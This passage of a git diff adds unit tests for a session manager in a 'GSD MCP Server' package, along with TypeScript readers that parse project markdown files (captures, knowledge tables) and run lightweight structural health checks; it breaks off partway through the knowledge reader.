+ * 3. Testing tool registration via createMcpServer
+ * 4. Testing CLI path resolution via static method
+ */
+
+import { describe, it, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { resolve } from 'node:path';
+import { EventEmitter } from 'node:events';
+
+import { SessionManager } from './session-manager.js';
+import { createMcpServer } from './server.js';
+import { MAX_EVENTS } from './types.js';
+import type { ManagedSession, CostAccumulator, PendingBlocker } from './types.js';
+
+// ---------------------------------------------------------------------------
+// Mock RpcClient (duck-typed to match RpcClient interface)
+// ---------------------------------------------------------------------------
+
+class MockRpcClient {
+  started = false;
+  stopped = false;
+  aborted = false;
+  prompted: string[] = [];
+  private eventListeners: Array<(event: Record<string, unknown>) => void> = [];
+  uiResponses: Array<{ requestId: string; response: Record<string, unknown> }> = [];
+
+  /** Control — set to make start() reject */
+  startError: Error | null = null;
+  /** Control — set to make init() reject */
+  initError: Error | null = null;
+  /** Control — override sessionId from init */
+  initSessionId = 'mock-session-001';
+
+  cwd: string;
+  args: string[];
+
+  constructor(options?: Record<string, unknown>) {
+    this.cwd = (options?.cwd as string) ?? '';
+    this.args = (options?.args as string[]) ?? [];
+  }
+
+  async start(): Promise<void> {
+    if (this.startError) throw this.startError;
+    this.started = true;
+  }
+
+  async stop(): Promise<void> {
+    this.stopped = true;
+  }
+
+  async init(): Promise<{ sessionId: string; version: string }> {
+    if (this.initError) throw this.initError;
+    return { sessionId: this.initSessionId, version: '2.51.0' };
+  }
+
+  onEvent(listener: (event: Record<string, unknown>) => void): () => void {
+    this.eventListeners.push(listener);
+    return () => {
+      const idx = this.eventListeners.indexOf(listener);
+      if (idx >= 0) this.eventListeners.splice(idx, 1);
+    };
+  }
+
+  async prompt(message: string): Promise<void> {
+    this.prompted.push(message);
+  }
+
+  async abort(): Promise<void> {
+    this.aborted = true;
+  }
+
+  sendUIResponse(requestId: string, response: Record<string, unknown>): void {
+    this.uiResponses.push({ requestId, response });
+  }
+
+  /** Test helper — emit an event to all listeners */
+  emitEvent(event: Record<string, unknown>): void {
+    for (const listener of this.eventListeners) {
+      listener(event);
+    }
+  }
+}
+
+// ---------------------------------------------------------------------------
+// TestableSessionManager — injects mock clients without module mocking
+// ---------------------------------------------------------------------------
+
+/**
+ * Subclass that overrides startSession to use MockRpcClient instead of the
+ * real RpcClient. We directly construct the session object, mirroring the
+ * parent's logic but with our mock.
+ */
+class TestableSessionManager extends SessionManager {
+  /** The last mock client created */
+  lastClient: MockRpcClient | null = null;
+  /** All mock clients */
+  allClients: MockRpcClient[] = [];
+  /** Counter for unique session IDs across multiple sessions */
+  private sessionCounter = 0;
+  /** Control: set to make startSession fail during init */
+  nextInitError: Error | null = null;
+  /** Control: set to make startSession fail during start */
+  nextStartError: Error | null = null;
+
+  override async startSession(projectDir: string, options: { cliPath?: string; command?: string; model?: string; bare?: boolean } = {}): Promise<string> {
+    if (!projectDir || projectDir.trim() === '') {
+      throw new Error('projectDir is required and cannot be empty');
+    }
+
+    const resolvedDir = resolve(projectDir);
+
+    // Check duplicate via getSessionByDir
+    const existing = this.getSessionByDir(resolvedDir);
+    if (existing) {
+      throw new Error(
+        `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})`
+      );
+    }
+
+    const client = new MockRpcClient({ cwd: resolvedDir, args: [] });
+    if (this.nextStartError) {
+      client.startError = this.nextStartError;
+      this.nextStartError = null;
+    }
+    if (this.nextInitError) {
+      client.initError = this.nextInitError;
+      this.nextInitError = null;
+    }
+
+    this.sessionCounter++;
+    client.initSessionId = `mock-session-${String(this.sessionCounter).padStart(3, '0')}`;
+    this.lastClient = client;
+    this.allClients.push(client);
+
+    // Create the session shell
+    const session: ManagedSession = {
+      sessionId: '',
+      projectDir: resolvedDir,
+      status: 'starting',
+      client: client as any, // duck-typed mock
+      events: [],
+      pendingBlocker: null,
+      cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } },
+      startTime: Date.now(),
+    };
+
+    // Insert into internal sessions map — access via protected method
+    this._putSession(resolvedDir, session);
+
+    try {
+      await client.start();
+
+      const initResult = await client.init();
+      session.sessionId = initResult.sessionId;
+      session.status = 'running';
+
+      // Wire event tracking using the same handleEvent logic as parent
+      session.unsubscribe = client.onEvent((event: Record<string, unknown>) => {
+        this._handleEvent(session, event);
+      });
+
+      // Kick off auto-mode
+      const command = options.command ?? '/gsd auto';
+      await client.prompt(command);
+
+      return session.sessionId;
+    } catch (err) {
+      session.status = 'error';
+      session.error = err instanceof Error ? err.message : String(err);
+      try { await client.stop(); } catch { /* swallow */ }
+      throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`);
+    }
+  }
+
+  /** Expose internal session map insertion for testing */
+  _putSession(key: string, session: ManagedSession): void {
+    // Access the private sessions map via any cast
+    (this as any).sessions.set(key, session);
+  }
+
+  /** Expose handleEvent for testing */
+  _handleEvent(session: ManagedSession, event: Record<string, unknown>): void {
+    (this as any).handleEvent(session, event);
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Test helpers
+// ---------------------------------------------------------------------------
+
+let allManagers: TestableSessionManager[] = [];
+
+function createManager(): TestableSessionManager {
+  const mgr = new TestableSessionManager();
+  allManagers.push(mgr);
+  return mgr;
+}
+
+// ---------------------------------------------------------------------------
+// SessionManager unit tests
+// ---------------------------------------------------------------------------
+
+describe('SessionManager', () => {
+  let sm: TestableSessionManager;
+
+  beforeEach(() => {
+    sm = createManager();
+  });
+
+  afterEach(async () => {
+    for (const mgr of allManagers) {
+      await mgr.cleanup();
+    }
+    allManagers = [];
+  });
+
+  it('startSession creates session and returns sessionId', async () => {
+    const sessionId = await sm.startSession('/tmp/test-project', { cliPath: '/usr/bin/gsd' });
+    assert.equal(sessionId, 'mock-session-001');
+
+    const session = sm.getSession(sessionId);
+    assert.ok(session);
+    assert.equal(session.status, 'running');
+    assert.equal(session.projectDir, resolve('/tmp/test-project'));
+  });
+
+  it('startSession sends /gsd auto by default', async () => {
+    await sm.startSession('/tmp/test-prompt', { cliPath: '/usr/bin/gsd' });
+    assert.ok(sm.lastClient);
+    assert.deepEqual(sm.lastClient.prompted, ['/gsd auto']);
+  });
+
+  it('startSession sends custom command when provided', async () => {
+    await sm.startSession('/tmp/test-cmd', { cliPath: '/usr/bin/gsd', command: '/gsd auto --resume' });
+    assert.ok(sm.lastClient);
+    assert.deepEqual(sm.lastClient.prompted, ['/gsd auto --resume']);
+  });
+
+  it('startSession rejects duplicate projectDir', async () => {
+    await sm.startSession('/tmp/dup-test', { cliPath: '/usr/bin/gsd' });
+    await assert.rejects(
+      () => sm.startSession('/tmp/dup-test', { cliPath: '/usr/bin/gsd' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('Session already active'));
+        return true;
+      },
+    );
+  });
+
+  it('startSession rejects empty projectDir', async () => {
+    await assert.rejects(
+      () => sm.startSession('', { cliPath: '/usr/bin/gsd' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('projectDir is required'));
+        return true;
+      },
+    );
+  });
+
+  it('startSession sets error status on start() failure', async () => {
+    sm.nextStartError = new Error('spawn failed');
+
+    await assert.rejects(
+      () => sm.startSession('/tmp/fail-start', { cliPath: '/usr/bin/gsd' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('Failed to start session'));
+        assert.ok(err.message.includes('spawn failed'));
+        return true;
+      },
+    );
+  });
+
+  it('startSession sets error status on init() failure', async () => {
+    sm.nextInitError = new Error('handshake failed');
+
+    await assert.rejects(
+      () => sm.startSession('/tmp/fail-init', { cliPath: '/usr/bin/gsd' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('Failed to start session'));
+        assert.ok(err.message.includes('handshake failed'));
+        return true;
+      },
+    );
+  });
+
+  it('getSession returns undefined for unknown sessionId', () => {
+    const result = sm.getSession('nonexistent-id');
+    assert.equal(result, undefined);
+  });
+
+  it('getSessionByDir returns session for known dir', async () => {
+    await sm.startSession('/tmp/by-dir', { cliPath: '/usr/bin/gsd' });
+    const session = sm.getSessionByDir('/tmp/by-dir');
+    assert.ok(session);
+    assert.equal(session.sessionId, 'mock-session-001');
+  });
+
+  it('resolveBlocker errors when no pending blocker', async () => {
+    const sessionId = await sm.startSession('/tmp/no-blocker', { cliPath: '/usr/bin/gsd' });
+    await assert.rejects(
+      () => sm.resolveBlocker(sessionId, 'some response'),
+      (err: Error) => {
+        assert.ok(err.message.includes('No pending blocker'));
+        return true;
+      },
+    );
+  });
+
+  it('resolveBlocker errors for unknown session', async () => {
+    await assert.rejects(
+      () => sm.resolveBlocker('unknown-session', 'some response'),
+      (err: Error) => {
+        assert.ok(err.message.includes('Session not found'));
+        return true;
+      },
+    );
+  });
+
+  it('resolveBlocker clears pendingBlocker and sends UI response', async () => {
+    const sessionId = await sm.startSession('/tmp/blocker-resolve', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    // Simulate a blocking UI request event
+    client.emitEvent({
+      type: 'extension_ui_request',
+      id: 'req-42',
+      method: 'select',
+      title: 'Pick an option',
+    });
+
+    const session = sm.getSession(sessionId)!;
+    assert.ok(session.pendingBlocker);
+    assert.equal(session.status, 'blocked');
+
+    // Resolve the blocker
+    await sm.resolveBlocker(sessionId, 'option-a');
+
+    assert.equal(session.pendingBlocker, null);
+    assert.equal(session.status, 'running');
+    assert.equal(client.uiResponses.length, 1);
+    assert.equal(client.uiResponses[0].requestId, 'req-42');
+  });
+
+  it('cancelSession calls abort + stop on client', async () => {
+    const sessionId = await sm.startSession('/tmp/cancel-test', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    await sm.cancelSession(sessionId);
+
+    assert.ok(client.aborted);
+    assert.ok(client.stopped);
+
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.status, 'cancelled');
+  });
+
+  it('cancelSession errors for unknown session', async () => {
+    await assert.rejects(
+      () => sm.cancelSession('unknown'),
+      (err: Error) => {
+        assert.ok(err.message.includes('Session not found'));
+        return true;
+      },
+    );
+  });
+
+  it('cleanup stops all active sessions', async () => {
+    await sm.startSession('/tmp/cleanup-1', { cliPath: '/usr/bin/gsd' });
+    await sm.startSession('/tmp/cleanup-2', { cliPath: '/usr/bin/gsd' });
+
+    assert.equal(sm.allClients.length, 2);
+
+    await sm.cleanup();
+
+    for (const client of sm.allClients) {
+      assert.ok(client.stopped, 'Client should be stopped after cleanup');
+    }
+  });
+
+  it('event ring buffer caps at MAX_EVENTS', async () => {
+    const sessionId = await sm.startSession('/tmp/ring-buffer', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    for (let i = 0; i < MAX_EVENTS + 20; i++) {
+      client.emitEvent({ type: 'tool_use', index: i });
+    }
+
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.events.length, MAX_EVENTS);
+    // Oldest events trimmed — first event index should be 20
+    assert.equal((session.events[0] as Record<string, unknown>).index, 20);
+  });
+
+  it('blocker detection: non-fire-and-forget extension_ui_request sets pendingBlocker', async () => {
+    const sessionId = await sm.startSession('/tmp/blocker-detect', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    // 'select' is not in FIRE_AND_FORGET_METHODS
+    client.emitEvent({
+      type: 'extension_ui_request',
+      id: 'req-99',
+      method: 'select',
+      title: 'Choose wisely',
+    });
+
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.status, 'blocked');
+    assert.ok(session.pendingBlocker);
+    assert.equal(session.pendingBlocker.id, 'req-99');
+    assert.equal(session.pendingBlocker.method, 'select');
+  });
+
+  it('fire-and-forget methods do not set pendingBlocker', async () => {
+    const sessionId = await sm.startSession('/tmp/fire-forget', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    // 'notify' is fire-and-forget — on its own (no terminal prefix) should not block
+    client.emitEvent({
+      type: 'extension_ui_request',
+      id: 'req-100',
+      method: 'notify',
+      message: 'Just a notification',
+    });
+
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.status, 'running');
+    assert.equal(session.pendingBlocker, null);
+  });
+
+  it('terminal detection: auto-mode stopped sets status to completed', async () => {
+    const sessionId = await sm.startSession('/tmp/terminal', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    client.emitEvent({
+      type: 'extension_ui_request',
+      method: 'notify',
+      message: 'Auto-mode stopped — all tasks complete',
+      id: 'term-1',
+    });
+
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.status, 'completed');
+  });
+
+  it('terminal detection with blocked: message sets status to blocked', async () => {
+    const sessionId = await sm.startSession('/tmp/terminal-blocked', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    client.emitEvent({
+      type: 'extension_ui_request',
+      method: 'notify',
+      message: 'Auto-mode stopped — blocked: needs user input',
+      id: 'block-1',
+    });
+
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.status, 'blocked');
+    assert.ok(session.pendingBlocker);
+  });
+
+  it('cost tracking: cumulative-max from cost_update events', async () => {
+    const sessionId = await sm.startSession('/tmp/cost-track', { cliPath: '/usr/bin/gsd' });
+    const client = sm.lastClient!;
+
+    client.emitEvent({
+      type: 'cost_update',
+      cumulativeCost: 0.05,
+      tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100 },
+    });
+
+    client.emitEvent({
+      type: 'cost_update',
+      cumulativeCost: 0.12,
+      tokens: { input: 2500, output: 800, cacheRead: 150, cacheWrite: 300 },
+    });
+
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.cost.totalCost, 0.12);
+    assert.equal(session.cost.tokens.input, 2500);
+    assert.equal(session.cost.tokens.output, 800);
+    assert.equal(session.cost.tokens.cacheRead, 200); // First was higher
+    assert.equal(session.cost.tokens.cacheWrite, 300); // Second was higher
+  });
+
+  it('getResult returns HeadlessJsonResult-shaped object', async () => {
+    const sessionId = await sm.startSession('/tmp/result-shape', { cliPath: '/usr/bin/gsd' });
+    const result = sm.getResult(sessionId);
+
+    assert.equal(result.sessionId, sessionId);
+    assert.equal(result.projectDir, resolve('/tmp/result-shape'));
+    assert.equal(result.status, 'running');
+    assert.equal(typeof result.durationMs, 'number');
+    assert.ok(result.cost);
+    assert.ok(Array.isArray(result.recentEvents));
+    assert.equal(result.pendingBlocker, null);
+    assert.equal(result.error, null);
+  });
+
+  it('getResult errors for unknown session', () => {
+    assert.throws(
+      () => sm.getResult('unknown'),
+      (err: Error) => {
+        assert.ok(err.message.includes('Session not found'));
+        return true;
+      },
+    );
+  });
+});
+
+// ---------------------------------------------------------------------------
+// CLI path resolution tests
+// ---------------------------------------------------------------------------
+
+describe('SessionManager.resolveCLIPath', () => {
+  const originalGsdPath = process.env['GSD_CLI_PATH'];
+  const originalPath = process.env['PATH'];
+
+  afterEach(() => {
+    if (originalGsdPath !== undefined) {
+      process.env['GSD_CLI_PATH'] = originalGsdPath;
+    } else {
+      delete process.env['GSD_CLI_PATH'];
+    }
+    if (originalPath !== undefined) {
+      process.env['PATH'] = originalPath;
+    }
+  });
+
+  it('GSD_CLI_PATH env var takes precedence', () => {
+    process.env['GSD_CLI_PATH'] = '/custom/path/to/gsd';
+    const result = SessionManager.resolveCLIPath();
+    assert.equal(result, resolve('/custom/path/to/gsd'));
+  });
+
+  it('throws when GSD_CLI_PATH not set and which fails', () => {
+    delete process.env['GSD_CLI_PATH'];
+    process.env['PATH'] = '/nonexistent';
+    assert.throws(
+      () => SessionManager.resolveCLIPath(),
+      (err: Error) => {
+        assert.ok(err.message.includes('Cannot find GSD CLI'));
+        return true;
+      },
+    );
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Tool registration tests (via createMcpServer)
+// ---------------------------------------------------------------------------
+
+describe('createMcpServer tool registration', () => {
+  let sm: TestableSessionManager;
+
+  beforeEach(() => {
+    sm = createManager();
+  });
+
+  afterEach(async () => {
+    for (const mgr of allManagers) {
+      await mgr.cleanup();
+    }
+    allManagers = [];
+  });
+
+  it('creates server successfully with all required methods', async () => {
+    const { server } = await createMcpServer(sm);
+    assert.ok(server);
+    assert.ok(typeof server.connect === 'function');
+    assert.ok(typeof server.close === 'function');
+  });
+
+  it('gsd_execute flow returns sessionId on success', async () => {
+    const sessionId = await sm.startSession('/tmp/tool-exec', { cliPath: '/usr/bin/gsd' });
+    assert.equal(typeof sessionId, 'string');
+    assert.ok(sessionId.length > 0);
+  });
+
+  it('gsd_status flow returns correct shape', async () => {
+    const sessionId = await sm.startSession('/tmp/tool-status', { cliPath: '/usr/bin/gsd' });
+    const session = sm.getSession(sessionId)!;
+
+    assert.equal(typeof session.status, 'string');
+    assert.ok(Array.isArray(session.events));
+    assert.ok(session.cost);
+    assert.equal(typeof session.startTime, 'number');
+  });
+
+  it('gsd_resolve_blocker flow returns error when no blocker', async () => {
+    const sessionId = await sm.startSession('/tmp/tool-resolve', { cliPath: '/usr/bin/gsd' });
+    await assert.rejects(
+      () => sm.resolveBlocker(sessionId, 'fix'),
+      (err: Error) => {
+        assert.ok(err.message.includes('No pending blocker'));
+        return true;
+      },
+    );
+  });
+
+  it('gsd_result flow returns HeadlessJsonResult shape', async () => {
+    const sessionId = await sm.startSession('/tmp/tool-result', { cliPath: '/usr/bin/gsd' });
+    const result = sm.getResult(sessionId);
+
+    assert.ok('sessionId' in result);
+    assert.ok('projectDir' in result);
+    assert.ok('status' in result);
+    assert.ok('durationMs' in result);
+    assert.ok('cost' in result);
+    assert.ok('recentEvents' in result);
+    assert.ok('pendingBlocker' in result);
+    assert.ok('error' in result);
+  });
+
+  it('gsd_cancel flow marks session as cancelled', async () => {
+    const sessionId = await sm.startSession('/tmp/tool-cancel', { cliPath: '/usr/bin/gsd' });
+    await sm.cancelSession(sessionId);
+    const session = sm.getSession(sessionId)!;
+    assert.equal(session.status, 'cancelled');
+  });
+});
diff --git a/packages/mcp-server/src/readers/captures.ts b/packages/mcp-server/src/readers/captures.ts
new file mode 100644
index 000000000..9cbd71570
--- /dev/null
+++ b/packages/mcp-server/src/readers/captures.ts
@@ -0,0 +1,119 @@
+// GSD MCP Server — captures reader
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { readFileSync, existsSync } from 'node:fs';
+import { resolveGsdRoot, resolveRootFile } from './paths.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+export type CaptureStatus = 'pending' | 'triaged' | 'resolved';
+export type CaptureClassification =
+  | 'quick-task' | 'inject' | 'defer' | 'replan' | 'note' | 'stop' | 'backtrack';
+
+export interface CaptureEntry {
+  id: string;
+  text: string;
+  timestamp: string;
+  status: CaptureStatus;
+  classification: CaptureClassification | null;
+  resolution: string | null;
+  rationale: string | null;
+  resolvedAt: string | null;
+  milestone: string | null;
+  executed: string | null;
+}
+
+export interface CapturesResult {
+  captures: CaptureEntry[];
+  counts: {
+    total: number;
+    pending: number;
+    resolved: number;
+    actionable: number;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Parser
+// ---------------------------------------------------------------------------
+
+function parseCapturesMarkdown(content: string): CaptureEntry[] {
+  const entries: CaptureEntry[] = [];
+
+  // Split on H3 headers: ### CAP-xxxxxxxx
+  const sections = content.split(/(?=^### CAP-)/m);
+
+  for (const section of sections) {
+    const idMatch = section.match(/^### (CAP-[\da-f]+)/);
+    if (!idMatch) continue;
+
+    const id = idMatch[1];
+    const field = (label: string): string | null => {
+      const re = new RegExp(`\\*\\*${label}:\\*\\*\\s*(.+)`, 'i');
+      const m = section.match(re);
+      return m ? m[1].trim() : null;
+    };
+
+    const status = (field('Status') ?? 'pending').toLowerCase() as CaptureStatus;
+    const classification = field('Classification') as CaptureClassification | null;
+
+    entries.push({
+      id,
+      text: field('Text') ?? '',
+      timestamp: field('Captured') ?? '',
+      status,
+      classification,
+      resolution: field('Resolution'),
+      rationale: field('Rationale'),
+      resolvedAt: field('Resolved'),
+      milestone: field('Milestone'),
+      executed: field('Executed'),
+    });
+  }
+
+  return entries;
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+const ACTIONABLE_CLASSIFICATIONS = new Set<string>(['quick-task', 'inject', 'replan']);
+
+export function readCaptures(
+  projectDir: string,
+  filter: 'all' | 'pending' | 'actionable' = 'all',
+): CapturesResult {
+  const gsd = resolveGsdRoot(projectDir);
+  const capturesPath = resolveRootFile(gsd, 'CAPTURES.md');
+
+  if (!existsSync(capturesPath)) {
+    return { captures: [], counts: { total: 0, pending: 0, resolved: 0, actionable: 0 } };
+  }
+
+  const content = readFileSync(capturesPath, 'utf-8');
+  let captures = parseCapturesMarkdown(content);
+
+  // Compute counts before filtering
+  const counts = {
+    total: captures.length,
+    pending: captures.filter((c) => c.status === 'pending').length,
+    resolved: captures.filter((c) => c.status === 'resolved').length,
+    actionable: captures.filter(
+      (c) => c.classification !== null && ACTIONABLE_CLASSIFICATIONS.has(c.classification),
+    ).length,
+  };
+
+  // Apply filter
+  if (filter === 'pending') {
+    captures = captures.filter((c) => c.status === 'pending');
+  } else if (filter === 'actionable') {
+    captures = captures.filter(
+      (c) => c.classification !== null && ACTIONABLE_CLASSIFICATIONS.has(c.classification),
+    );
+  }
+
+  return { captures, counts };
+}
diff --git a/packages/mcp-server/src/readers/doctor-lite.ts b/packages/mcp-server/src/readers/doctor-lite.ts
new file mode 100644
index 000000000..8b826090c
--- /dev/null
+++ b/packages/mcp-server/src/readers/doctor-lite.ts
@@ -0,0 +1,225 @@
+// GSD MCP Server — lightweight structural health checks
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { existsSync, readFileSync } from 'node:fs';
+import {
+  resolveGsdRoot,
+  resolveRootFile,
+  findMilestoneIds,
+  resolveMilestoneFile,
+  resolveMilestoneDir,
+  findSliceIds,
+  resolveSliceFile,
+  findTaskFiles,
+} from './paths.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+export type Severity = 'info' | 'warning' | 'error';
+
+export interface DoctorIssue {
+  severity: Severity;
+  code: string;
+  scope: 'project' | 'milestone' | 'slice' | 'task';
+  unitId: string;
+  message: string;
+  file?: string;
+}
+
+export interface DoctorResult {
+  ok: boolean;
+  issues: DoctorIssue[];
+  counts: { error: number; warning: number; info: number };
+}
+
+// ---------------------------------------------------------------------------
+// Check implementations
+// ---------------------------------------------------------------------------
+
+function checkProjectLevel(gsdRoot: string, issues: DoctorIssue[]): void {
+  // PROJECT.md should exist
+  const projectPath = resolveRootFile(gsdRoot, 'PROJECT.md');
+  if (!existsSync(projectPath)) {
+    issues.push({
+      severity: 'warning',
+      code: 'missing_project_md',
+      scope: 'project',
+      unitId: '',
+      message: 'PROJECT.md is missing — project lacks a description',
+      file: projectPath,
+    });
+  }
+
+  // STATE.md should exist if milestones exist
+  const milestones = findMilestoneIds(gsdRoot);
+  if (milestones.length > 0) {
+    const statePath = resolveRootFile(gsdRoot, 'STATE.md');
+    if (!existsSync(statePath)) {
+      issues.push({
+        severity: 'warning',
+        code: 'missing_state_md',
+        scope: 'project',
+        unitId: '',
+        message: 'STATE.md is missing — run /gsd status to regenerate',
+        file: statePath,
+      });
+    }
+  }
+}
+
+function checkMilestoneLevel(gsdRoot: string, mid: string, issues: DoctorIssue[]): void {
+  const mDir = resolveMilestoneDir(gsdRoot, mid);
+  if (!mDir) {
+    issues.push({
+      severity: 'error',
+      code: 'missing_milestone_dir',
+      scope: 'milestone',
+      unitId: mid,
+      message: `Milestone directory for ${mid} not found`,
+    });
+    return;
+  }
+
+  // CONTEXT.md should exist
+  const ctxPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT');
+  if (!ctxPath || !existsSync(ctxPath)) {
+    // Check for draft
+    const draftPath = resolveMilestoneFile(gsdRoot, mid, 'CONTEXT-DRAFT');
+    if (!draftPath || !existsSync(draftPath)) {
+      issues.push({
+        severity: 'warning',
+        code: 'missing_context',
+        scope: 'milestone',
+        unitId: mid,
+        message: `${mid} has no CONTEXT.md — milestone lacks defined scope`,
+      });
+    }
+  }
+
+  // ROADMAP.md should exist if slices exist
+  const sliceIds = findSliceIds(gsdRoot, mid);
+  if (sliceIds.length > 0) {
+    const roadmapPath = resolveMilestoneFile(gsdRoot, mid, 'ROADMAP');
+    if (!roadmapPath || !existsSync(roadmapPath)) {
+      issues.push({
+        severity: 'warning',
+        code: 'missing_roadmap',
+        scope: 'milestone',
+        unitId: mid,
+        message: `${mid} has ${sliceIds.length} slices but no ROADMAP.md`,
+      });
+    }
+  }
+
+  // Check if all slices done but no SUMMARY
+  if (sliceIds.length > 0) {
+    const allDone = sliceIds.every((sid) => {
+      const tasks = findTaskFiles(gsdRoot, mid, sid);
+      return tasks.length > 0 && tasks.every((t) => t.hasSummary);
+    });
+    const summaryPath = resolveMilestoneFile(gsdRoot, mid, 'SUMMARY');
+    if (allDone && (!summaryPath || !existsSync(summaryPath))) {
+      issues.push({
+        severity: 'error',
+        code: 'all_slices_done_missing_summary',
+        scope: 'milestone',
+        unitId: mid,
+        message: `${mid} has all slices completed but no SUMMARY.md`,
+      });
+    }
+  }
+}
+
+function checkSliceLevel(
+  gsdRoot: string, mid: string, sid: string, issues: DoctorIssue[],
+): void {
+  const unitId = `${mid}/${sid}`;
+
+  // PLAN.md should exist
+  const planPath = resolveSliceFile(gsdRoot, mid, sid, 'PLAN');
+  if (!planPath || !existsSync(planPath)) {
+    issues.push({
+      severity: 'error',
+      code: 'missing_slice_plan',
+      scope: 'slice',
+      unitId,
+      message: `${unitId} has no PLAN.md`,
+    });
+  }
+
+  // Tasks should have plans
+  const tasks = findTaskFiles(gsdRoot, mid, sid);
+  for (const task of tasks) {
+    const taskUnitId = `${unitId}/${task.id}`;
+    if (!task.hasPlan) {
+      issues.push({
+        severity: 'warning',
+        code: 'missing_task_plan',
+        scope: 'task',
+        unitId: taskUnitId,
+        message: `${taskUnitId} has a summary but no plan file`,
+      });
+    }
+  }
+
+  // Check for empty slice (directory exists but no tasks or plan)
+  if (tasks.length === 0 && (!planPath || !existsSync(planPath))) {
+    issues.push({
+      severity: 'warning',
+      code: 'empty_slice',
+      scope: 'slice',
+      unitId,
+      message: `${unitId} has no plan and no tasks — may be abandoned`,
+    });
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+export function runDoctorLite(projectDir: string, scope?: string): DoctorResult {
+  const gsdRoot = resolveGsdRoot(projectDir);
+  const issues: DoctorIssue[] = [];
+
+  if (!existsSync(gsdRoot)) {
+    return {
+      ok: true,
+      issues: [{
+        severity: 'info',
+        code: 'no_gsd_directory',
+        scope: 'project',
+        unitId: '',
+        message: 'No .gsd/ directory found — project not initialized',
+      }],
+      counts: { error: 0, warning: 0, info: 1 },
+    };
+  }
+
+  // Project-level checks
+  checkProjectLevel(gsdRoot, issues);
+
+  // Milestone + slice checks
+  const milestoneIds = scope
+    ? findMilestoneIds(gsdRoot).filter((id) => id === scope)
+    : findMilestoneIds(gsdRoot);
+
+  for (const mid of milestoneIds) {
+    checkMilestoneLevel(gsdRoot, mid, issues);
+
+    const sliceIds = findSliceIds(gsdRoot, mid);
+    for (const sid of sliceIds) {
+      checkSliceLevel(gsdRoot, mid, sid, issues);
+    }
+  }
+
+  const counts = {
+    error: issues.filter((i) => i.severity === 'error').length,
+    warning: issues.filter((i) => i.severity === 'warning').length,
+    info: issues.filter((i) => i.severity === 'info').length,
+  };
+
+  return { ok: counts.error === 0, issues, counts };
+}
diff --git a/packages/mcp-server/src/readers/index.ts b/packages/mcp-server/src/readers/index.ts
new file mode 100644
index 000000000..d5b3368c7
--- /dev/null
+++ b/packages/mcp-server/src/readers/index.ts
@@ -0,0 +1,16 @@
+// GSD MCP Server — readers barrel export
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+export { resolveGsdRoot, resolveRootFile } from './paths.js';
+export { readProgress } from './state.js';
+export type { ProgressResult } from './state.js';
+export { readRoadmap } from './roadmap.js';
+export type { RoadmapResult, MilestoneInfo, SliceInfo, TaskInfo } from './roadmap.js';
+export { readHistory } from './metrics.js';
+export type { HistoryResult, MetricsUnit } from './metrics.js';
+export { readCaptures } from './captures.js';
+export type { CapturesResult, CaptureEntry } from './captures.js';
+export { readKnowledge } from './knowledge.js';
+export type { KnowledgeResult, KnowledgeEntry } from './knowledge.js';
+export { runDoctorLite } from './doctor-lite.js';
+export type { DoctorResult, DoctorIssue } from './doctor-lite.js';
diff --git a/packages/mcp-server/src/readers/knowledge.ts b/packages/mcp-server/src/readers/knowledge.ts
new file mode 100644
index 000000000..134df44e0
--- /dev/null
+++ b/packages/mcp-server/src/readers/knowledge.ts
@@ -0,0 +1,111 @@
+// GSD MCP Server — knowledge base reader
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { readFileSync, existsSync } from 'node:fs';
+import { resolveGsdRoot, resolveRootFile } from './paths.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+export type KnowledgeType = 'rule' | 'pattern' | 'lesson';
+
+export interface KnowledgeEntry {
+  id: string;
+  type: KnowledgeType;
+  scope: string;
+  content: string;
+  addedAt: string;
+}
+
+export interface KnowledgeResult {
+  entries: KnowledgeEntry[];
+  counts: { rules: number; patterns: number; lessons: number };
+}
+
+// ---------------------------------------------------------------------------
+// Parser
+// ---------------------------------------------------------------------------
+
+function parseTableRows(section: string, type: KnowledgeType): KnowledgeEntry[] {
+  const entries: KnowledgeEntry[] = [];
+  const lines = section.split('\n');
+
+  for (const line of lines) {
+    if (!line.includes('|')) continue;
+    const cells = line.split('|').map((c) => c.trim()).filter(Boolean);
+    if (cells.length < 3) continue;
+    // Skip header/separator
